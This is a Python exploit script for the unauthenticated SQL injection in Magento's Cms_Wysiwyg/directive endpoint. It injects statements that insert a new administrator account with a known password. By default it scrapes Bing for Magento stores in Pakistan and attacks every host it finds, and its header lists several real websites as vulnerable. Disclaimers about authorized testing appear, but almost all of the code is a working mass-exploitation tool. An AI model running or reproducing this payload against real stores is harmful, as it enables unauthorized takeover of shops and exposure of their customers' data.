#!/usr/bin/python
"""
Magento admin-account creation PoC.

Abuses the unauthenticated SQL injection reachable through
``/admin/Cms_Wysiwyg/directive/index/`` (analysed in the reference below) to
INSERT an ``admin_user`` row with a known password. Run it only against
stores you are authorized to test: the default ``main()`` scrapes targets from
a Bing search, which is indiscriminate, and a successful run leaves a
persistent admin account with a well-known password on the target.

POC Sites (reported vulnerable at time of writing):
www.anandindia.in
goyalglassware.com
ishopping.pk
value.pk
References:
http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
"""
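import base64
import os
import re
import sys

# urlsplit moved between Python 2 and 3; accept either interpreter.
try:
    from urlparse import urlsplit  # Python 2
except ImportError:
    from urllib.parse import urlsplit  # Python 3

# Only the third-party dependency can realistically be missing. Catch
# ImportError specifically: a bare ``except`` also swallowed SystemExit and
# KeyboardInterrupt and hid which module actually failed.
try:
    import requests
except ImportError as exc:
    sys.exit("\n\n[-] Import Error: {0}\n".format(exc))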
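def Exploit(url, username="stoker", password="secret", timeout=10):
    """Create a Magento admin account on ``url`` and report the result.

    This is the publicly analysed ``Cms_Wysiwyg/directive`` SQL injection
    (see the module docstring reference). ``___directive`` is the base64 of
    ``{{block type=Adminhtml/report_search_grid output=getCsvFile}}``; the
    base64 ``filter`` carries a ``popularity[field_expr]`` value that closes
    the grid's SQL expression with ``0);`` and appends our own statements:

    * build a password hash in Magento's legacy ``md5(salt + pw):salt`` form,
    * copy an existing admin's ``extra`` blob (presumably so the new row is
      well-formed for the admin UI),
    * INSERT the ``admin_user`` row and an ``admin_role`` row that attaches
      it to role id 1 (the Administrators role on a stock install -- confirm
      on the target).

    Args:
        url: target host (optionally ``host:port``). ``http://`` is
            prepended, so HTTPS-only stores are not reachable here.
        username: login name of the account to create.
        password: its password. Both values are spliced verbatim into the
            SQL text, so quotes and backslashes are rejected up front.
        timeout: seconds to wait for the POST; without it one hung target
            stalls every caller that loops over a host list.

    Returns:
        True when the server answered with a status below 400, else False
        (also on connection errors). NOTE: ``r.ok`` only reflects the HTTP
        status; it does NOT prove the injected SQL ran, so a "Credentials"
        line must be confirmed by logging in at ``http://<url>/admin``.

    Raises:
        ValueError: if ``username`` or ``password`` contains ``'`` or ``\\``.
    """
    if any(ch in username or ch in password for ch in "'\\"):
        raise ValueError("username/password must not contain ' or \\")

    final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"

    # Statements are concatenated with no separator, giving the same single
    # line the original produced by stripping newlines from a heredoc.
    statements = (
        "SET @SALT = 'rp';",
        "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));",
        "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;",
        "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());",
        "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');",
    )
    query = "".join(statements).format(username=username, password=password)
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
    payload = {
        "___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
        # .encode() keeps b64encode happy on Python 3; a no-op on Python 2.
        "filter": base64.b64encode(pfilter.encode("utf-8")),
        "forwarded": 1,
    }

    # One unreachable host must not abort the whole run (the caller's
    # catch-all would otherwise turn it into a fatal error).
    try:
        r = requests.post(final_url, data=payload, timeout=timeout)
    except requests.exceptions.RequestException as exc:
        print(" [-] {0} Request failed: {1}".format(url, exc))
        return False

    if r.ok:
        print("\n -- > [{0}/admin] Credentials: ['{1}' : '{2}']".format(url, username, password))
        return True
    print(" [-] {0} Not Vulnerable".format(url))
    return False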
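# Bing's own navigation links are hrefs on the results page too and would
# otherwise be "exploited" along with the real results; hosts under these
# domains are skipped. Extend the list if other non-result hosts show up.
_SEARCH_ENGINE_HOSTS = ("bing.com", "microsoft.com", "live.com")
_BING_SEARCH = "http://www.bing.com/search?q=Powered+by+Magento+site%3Apk"


def _extract_hosts(html):
    """Return the distinct, non-empty netlocs of every href in ``html``.

    Relative links and anchors (empty netloc) are dropped, as are hosts that
    belong to the search engine itself.
    """
    hosts = set()
    for link in re.findall(r'href=[\'"]?([^\'" >]+)', html):
        netloc = urlsplit(link).netloc
        if not netloc:
            continue
        # Strip userinfo and port before matching the domain suffix.
        host = netloc.rsplit("@", 1)[-1].split(":")[0].lower()
        if any(host == d or host.endswith("." + d) for d in _SEARCH_ENGINE_HOSTS):
            continue
        hosts.add(netloc)
    return hosts


def _hosts_from_bing(timeout=10):
    """Scrape candidate Magento hosts from the original Bing dork.

    The original author notes Google (``inurl:js/magentothem/``) finds more
    but rate-limits with a captcha, and that Bing's ``instreamUrl:``/
    ``Title:``/``URL:`` operators did not work for this query.
    """
    response = requests.get(_BING_SEARCH, timeout=timeout)
    return _extract_hosts(response.text)


def main(targets=None):
    """Run ``Exploit()`` against each host in ``targets``.

    ``targets`` defaults to the command-line arguments (bare hosts such as
    ``shop.example.com``). When neither is given, the original behaviour is
    kept for compatibility: a Bing search for "Powered by Magento site:pk"
    is scraped and every linked host is attacked -- an indiscriminate list,
    so prefer passing explicit, authorized targets.
    """
    if targets is None:
        targets = sys.argv[1:]
    if not targets:
        targets = _hosts_from_bing()
    for host in sorted(set(targets)):
        Exploit(host)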
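if __name__ == '__main__':
    # 'cls' is Windows-only; elsewhere it just prints a shell error.
    os.system('cls' if os.name == 'nt' else 'clear')
    print('''\n
-------------------------------------------------
Title: Magento Auth Exploit !
Author: Muhammad Adeel
Mail: Chaudhary1337@gmail.com
Blog: http://urdusecurity.blogspot.com
-------------------------------------------------\n\n
''')
    try:
        main()
    except KeyboardInterrupt:
        # Let Ctrl-C stop a long target list cleanly.
        sys.exit("\n[-] Interrupted")
    except Exception as exc:
        # Report the cause instead of swallowing every exception type
        # behind a generic message.
        sys.exit("\n[-] Error: {0!r}".format(exc))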